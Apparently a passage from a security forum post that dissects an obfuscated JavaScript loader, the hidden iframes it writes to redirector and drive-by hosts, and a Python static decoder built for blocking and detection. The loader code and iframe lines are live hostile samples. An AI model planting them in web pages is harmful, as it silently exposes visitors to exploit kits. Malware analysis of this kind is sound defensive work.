var Hz_c='TjBTZ8TZsTX=TZsTX/TX8TZsTXUTXyTvjT8UTvjTvATXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvjTvUTvjTXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZsTXpTsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTZ8TZWTXvTZ8TZsTZvTX/TXcTXZTvAT8jTvyTvjTXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZsTXpTsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTXyTX=TZ8TZsTs/TXcTXsTXWTZATspTXXTvATvvTvjTvvTv/TvUT8=Tv/Tv/Tv/TvjTvpTvjTvAT8=T8jT8jT8jTvjTvBTvjT8XT8jTvjTvBTvjT8XT8jTv/T8nTjBTjBTZXTX=TZvTvjTX=TXyTXyTWpTZsTvjT8UTvjTvvTvvT8nTjBTZXTX=TZvTvjTXUTZsTX8TXATvjT8UTvjTX=TXyTXyTWpTZsTvcTXUTX=TZsTX8TXATvATZ8TZsTX=TZsTX/TX8TZsTXUTXyTv/T8nTjBTjBTjBTjBTX/TXXTvjTvATvjTXUTZsTX8TXATvjTv=T8UTvjTXcTZWTXyTXyTvjTv/TvjTZnTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTZsTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8WT8vTvXTZ8T8UT8jTvXTXWT8UT8=TvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8jTvZTvjTXATXWTX/TXZTXATZsT8UTvZT8jTvZTvjTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTjBTZUTvjTvjTXWTXyTZ8TXWTvjTvjTZnTjBTjBTj/Tj/TjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTZ8TXpTXUTXpTZsTvcTX8TXpTvcTX8TX8TvpTZvTX8TZvTXsTX8TZATvcTZjTXATZjT8pTXZTXBT8UTX8TZWTZ8TZsT8=T8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvjTXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTvjTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTXBTZ8TWpTXWTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8WT8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvjTXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTjBTjBTjBTZUTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX=TvjTXATZvTXWTXXT8UTvZTXATZsTZsTZjTvWT88Ts=TvWT8vTsXTvWT8vTsXTZZTZZTZZTvcTXvTX/TXZTX8TXpTXUTXUTXWTZvTX8TXWTvcTX8TXpTXUTvWT8vTsXTvWT88TsXTXATZvTXWTXXTvWT88TssT8ZTXsTXUTvUT8=TvZTvjTZsTX=TZvTXZTXWTZsT8UTvZTWpTXvTXyTX=TXcTXnTvZTvWT88TsWTvWT88Ts8TX/TXUTXZTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTXvTXsTXvTvpTX=TsvTX/TXZTs8TXpTXUTXUTXWTZvTX8TXWTvpT8ZT8vT8ATZAT8/T8jTZ8TZsTX=TZsTvcTXZTX/TXXTvZTvjTXvTXpTZvTXsTXWTZvT8UTvZT8jTvZTvjTvWT88TsWTvWT88Ts8TvpTX=TvWT88TsWTvvTv/Tv/T8nTjBTjBTjB'; // encoded payload
var DpdNZ='mEeYnB0osA1-6SC:raMQ=XFyK/5&PpD_I2xLH3OZjqJwb4dV9RWfgv.l7ktiuzhNc%T?G8U'; // output alphabet
var t_H='3caPmnjI6B=JX0yOVCS-9op5u_Wf1iUY.v2%K8MxlE7hDs:?/wQ4LtHqZFGd&NbReTkgzAr'; // lookup alphabet
var rSE='';var Jnox;var t_dIH;
// same substitution loop as the facilitatedigital.net loader above, with fresh variable names and alphabets
for(Jnox=0;Jnox<Hz_c.length;Jnox++){ t_dIH=t_H.indexOf(Hz_c.charAt(Jnox));if(t_dIH>-1){ rSE+=DpdNZ.charAt(t_dIH);}}
EDTmvV(Uzym(rSE)); // eval(unescape(decoded))

This causes a hidden iframe to be written that causes the client to hit a redirect to a driveby:

Code: [Select]
<iframe src='http://mesomot.co.cc/rcrdcx.php?gj=cust12' style='visibility:hidden;' width='1' height='1' ></iframe>
<iframe src='http://media.topsann.com/stats_js_e.php?id=176552' style='visibility:hidden;' width='1' height='1' ></iframe>
The co.cc domain then redirects to the actual drive-by located here:
http://uyyty.com/qu/sjmba.php

This drive-by is again single-shot; subsequent visits to it will not serve up exploits, it will usually just redirect to google.com.
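A static decoder for the loader shape in this post, added here as an example and not taken from the thread: it pulls the two alphabets and the encoded blob out of the script text and applies the same lookup the loop does, so the second stage and its iframe targets are recovered without ever running eval. The alphabets are copied from the first facilitatedigital.net response above and a prefix of its real blob serves as a known-answer check; the sample payload and the redirector.invalid hostname are constructed for the test.

```python
import re
from urllib.parse import unquote

# Alphabets copied from the first facilitatedigital.net loader above (its _Mge and XOy).
# Each blob character is found in LOOKUP and replaced by the OUT character at the same
# index; the result is a %XX string that the loader then unescape()s and eval()s.
OUT = "WXfmR9Fs6OV3DTZ4QyYcL-G=txvz_ajw207.EN?&JHMdKUk5PB:8Ai/luIop%CS1benrhqg"
LOOKUP = "F8LSEUA3JzbnRio/0HBe.&jdKO%Wr:cxa9Qp1ut-DysgT=IkmlZMPV7Y4v?26Gh_CwX5qfN"
# Prefix of the real HIhVN blob from the same response, used as a known-answer check.
REAL_PREFIX = "6J/6JA6Jn6Qk6JR6Jk6J16Q/6a16QQ6Qa6JU6Q/6Jk6aM6Qk6J16Jk6Qn6Jn6J_6Q96Jk6aM"
STRING_VAR = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")
# loop shape:  k = LOOKUP.indexOf(BLOB.charAt(i)); ... out += OUT.charAt(k)
LOOP_SHAPE = re.compile(r"(\w+)\.indexOf\((\w+)\.charAt\(\w+\)\).*?\+=\s*(\w+)\.charAt\(", re.S)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.I)

def js_unescape(s):
    """JavaScript unescape(): %uXXXX first, then %XX as single bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode_blob(blob, lookup=LOOKUP, out=OUT):
    """The substitution step; like the loop, blob characters not in LOOKUP are dropped."""
    return js_unescape("".join(out[lookup.index(c)] for c in blob if c in lookup))

def decode_loader(script):
    """Recover the string the loader would eval() by reading its tables, not by running it."""
    strings = dict(STRING_VAR.findall(script))
    m = LOOP_SHAPE.search(script)
    if m is None:
        raise ValueError("loader shape not recognised")
    lookup, blob, out = (strings[name] for name in m.groups())
    return decode_blob(blob, lookup, out)

def iframe_targets(script):
    """Peel the document.write(unescape('...')) layer and list every iframe src found."""
    stages = [decode_loader(script)]
    stages += [js_unescape(s) for s in re.findall(r"unescape\(['\"]([^'\"]*)['\"]\)", stages[0])]
    return [src for stage in stages for src in IFRAME_SRC.findall(stage)]

def build_sample(payload):
    """Constructed test input only: wraps PAYLOAD in the same loader shape as the page."""
    escaped = "".join("%%%02X" % ord(c) for c in payload)
    blob = "".join(LOOKUP[OUT.index(c)] for c in escaped)
    return ("var e=this['eval'];var u=this['unescape'];var b='%s';var o='%s';var l='%s';"
            "var r='';var i;var k;for(i=0;i<b.length;i++){ k=l.indexOf(b.charAt(i));"
            "if(k>-1){ r+=o.charAt(k);}}e(u(r));") % (blob, OUT, LOOKUP)

# Constructed second stage in the shape the post shows; the hostname is a placeholder.
SECOND_STAGE = ('document.write(unescape("%3Ciframe%20src%3D%22http%3A//redirector.invalid/'
                'r.php%3Fn%3Dcust1%22%20width%3D%221%22%20height%3D%221%22%3E%3C/iframe%3E"))')
SAMPLE = build_sample(SECOND_STAGE)
```

Running `decode_loader` on the first response above yields `document.write(unescape(...))`; `iframe_targets` then lists the redirector and stats hosts the post describes, which is the list to feed into blocking or detection.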